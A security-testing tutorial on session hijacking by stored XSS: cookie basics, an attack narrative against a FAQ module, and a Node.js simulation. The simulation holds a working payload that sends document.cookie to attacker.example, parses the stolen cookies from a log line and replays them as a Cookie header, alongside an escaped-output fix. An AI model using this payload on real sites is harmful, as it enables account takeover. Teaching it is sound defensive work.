Security testing: session hijacking using cross-site scripting techniques. A basic introduction to cookies and sessions, why cookies are needed, how they are hijacked, and for what purpose.
SESSION HIJACKING WITH XSS
"I BECOME YOU"
SESSION IN COOKIE
• HTTP AND HTTPS ARE STATELESS PROTOCOLS
• TO WORK AROUND THIS, WHEN YOU FIRST VISIT A SITE THE SERVER ISSUES YOU A UNIQUE SESSION ID, AND YOUR BROWSER SENDS IT BACK WITH EVERY LATER REQUEST SO THE SERVER CAN TELL IT IS STILL YOU
COOKIE…
• IS A SMALL PIECE OF TEXT STORED BY THE USER'S BROWSER.
• IS SENT BY THE WEB SERVER TO THE BROWSER IN A SET-COOKIE RESPONSE HEADER.
• IS STATIC: THE BROWSER SENDS IT BACK UNCHANGED, IN THE COOKIE REQUEST HEADER, EVERY TIME IT ACCESSES THAT SERVER (ONLY A NEW SET-COOKIE FROM THE SERVER CHANGES IT).
• HAS AN EXPIRATION TIME SET BY THE SERVER (EXPIRES OR MAX-AGE) AND IS DELETED AUTOMATICALLY WHEN IT PASSES; A COOKIE WITHOUT ONE LASTS ONLY UNTIL THE BROWSER SESSION ENDS.
• IS USED TO MAINTAIN THE USER'S AUTHENTICATION AND TO IMPLEMENT A SHOPPING CART DURING NAVIGATION, POSSIBLY ACROSS MULTIPLE VISITS.
• IS READABLE BY PAGE SCRIPT THROUGH document.cookie UNLESS THE SERVER SETS IT WITH THE HTTPONLY FLAG; THAT READABILITY IS WHAT THE HIJACKING BELOW DEPENDS ON.
HIJACKING : “ I BECOME YOU”
HIJACKER’S PERSONA
• Is a Customer Service user with limited access (level 5)
• Has knowledge in hacking
• Has coding skills
• Has a wicked motive of gaining full access to the application
HOW…
1. STEAL THE SESSION INFORMATION (USING AN XSS ATTACK)
2. REPLACE HIJACKER’S COOKIE WITH VICTIM’S
HOW HE PLANS THE ATTACK…
• LOOKS FOR VULNERABILITIES IN THE APPLICATION
• SEES AN OPPORTUNITY FOR XSS EXPLOITATION IN THE "KNOWLEDGEBASE" MODULE
• PLANTS A MALICIOUS SCRIPT IN AN FAQ ENTRY (STORED XSS: THE APPLICATION SAVES THE ENTRY AND RENDERS IT UNESCAPED TO EVERY READER)
• THE VICTIM VISITS THE FAQ ENTRY AND CLICKS THE LINK TO "SEE MORE INFO"
• THE VICTIM'S COOKIE INFORMATION IS SENT TO THE HIJACKER'S WEBSITE, WHERE IT GETS LOGGED
• THE HIJACKER USES A COOKIE EDITOR TO REPLACE HIS OWN COOKIE VALUES WITH THE VICTIM'S AND IS LOGGED IN TO THE APPLICATION AS THE VICTIM, WITH THE VICTIM'S ACCESS LEVEL
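The two halves of the attack, planting the script and then using what it sends home, as an added Node.js simulation that is not from the original slides. The FAQ renderer (vulnerable and escaped versions), the payload, the hijacker's logger URL attacker.example, the access-log line and the victim's cookie jar are all constructed for illustration; the theft only works because the victim's session cookie is assumed to lack HttpOnly.

```javascript
// Added example, not from the original slides: stored-XSS cookie theft, end to end,
// without a browser or network. All names, URLs and sample data are constructed.

// --- Victim application: the "Knowledgebase" FAQ page -----------------------

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Vulnerable version concatenates the stored entry straight into the page HTML;
// the hardened version escapes it, so the planted script becomes inert text.
function renderFaqEntry(entry, { escape }) {
  const q = escape ? escapeHtml(entry.question) : entry.question;
  const a = escape ? escapeHtml(entry.answer) : entry.answer;
  return `<div class="faq"><h3>${q}</h3><p>${a}</p><a href="#more">See more info</a></div>`;
}

// --- Hijacker side -----------------------------------------------------------

const HIJACKER_LOGGER = "https://attacker.example/log";   // assumed collection URL

// The script planted in the FAQ entry. In the victim's browser it reads
// document.cookie (cookies without HttpOnly only) and ships it to the logger
// as a query parameter, via an image request that needs no user interaction.
const PAYLOAD =
  `<img src="x" onerror="new Image().src='${HIJACKER_LOGGER}?c='+encodeURIComponent(document.cookie)">`;

// The URL the payload builds inside the browser, reproduced so it can run offline.
function buildExfilUrl(documentCookie) {
  return `${HIJACKER_LOGGER}?c=${encodeURIComponent(documentCookie)}`;
}

// On the hijacker's server the hit lands in the access log. Recover the stolen
// cookies from one (constructed) log line; returns null for unrelated requests.
function parseLoggedRequest(logLine) {
  const m = logLine.match(/"GET (\S+) HTTP\/[\d.]+"/);
  if (!m) return null;
  const raw = new URL(m[1], HIJACKER_LOGGER).searchParams.get("c");
  if (raw === null) return null;
  const cookies = {};
  for (const part of raw.split(";")) {
    const i = part.indexOf("=");
    if (i > 0) cookies[part.slice(0, i).trim()] = part.slice(i + 1).trim();
  }
  return cookies;
}

// Step 2 of the attack: what the cookie editor ends up sending. The hijacker's
// browser now presents the victim's session ID, so the server sees the victim.
function forgeCookieHeader(cookies) {
  return Object.entries(cookies).map(([k, v]) => `${k}=${v}`).join("; ");
}

// --- Walk-through -------------------------------------------------------------
function demo() {
  const entry = { question: "How do I reset my password?", answer: "Use the link below. " + PAYLOAD };
  console.log("vulnerable render:", renderFaqEntry(entry, { escape: false }));
  console.log("hardened render:  ", renderFaqEntry(entry, { escape: true }));

  // Constructed: the victim's cookie jar as document.cookie would expose it.
  const victimCookies = "SESSIONID=9f2c7a1e4b6d8c0a; lang=en";
  const u = new URL(buildExfilUrl(victimCookies));
  const logLine = `203.0.113.7 - - [01/Jan/2020:10:00:00 +0000] "GET ${u.pathname}${u.search} HTTP/1.1" 200 43`;
  const stolen = parseLoggedRequest(logLine);
  console.log("logged:", logLine);
  console.log("replay as Cookie header:", forgeCookieHeader(stolen));
  return stolen;
}

demo();
```

The hardened render does not remove the payload from the database; it only stops it from executing, which is why output escaping (plus HttpOnly on the session cookie) is the fix rather than hunting for bad entries.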